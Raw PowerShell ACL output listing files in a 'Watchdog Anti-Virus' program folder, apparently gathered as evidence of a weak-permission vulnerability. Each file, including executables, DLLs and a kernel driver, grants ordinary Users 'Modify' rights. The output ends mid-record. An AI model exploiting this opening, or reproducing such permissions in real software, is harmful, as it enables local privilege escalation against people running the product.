APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\Microsoft.Win32.SystemEvents.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\msvcp140d.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\Newtonsoft.Json.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\sciter.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\sentry.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\Setup.exe
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\sfc.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Configuration.ConfigurationManager.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Diagnostics.EventLog.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Diagnostics.EventLog.Messages.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\System.Drawing.Common.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Security.Cryptography.ProtectedData.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Security.Permissions.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Threading.AccessControl.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\ucrtbased.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\unins000.dat
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\unins000.exe
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\vcruntime140d.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\vcruntime140_1.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\vcruntime140_1d.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.deps.json
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Diag.deps.json
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Diag.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Diag.exe
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Diag.runtimeconfig.json
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Domain.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.runtimeconfig.json
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Sciter.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.SDK.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Shared.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-driver.sys
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native\attachments
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3
418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-
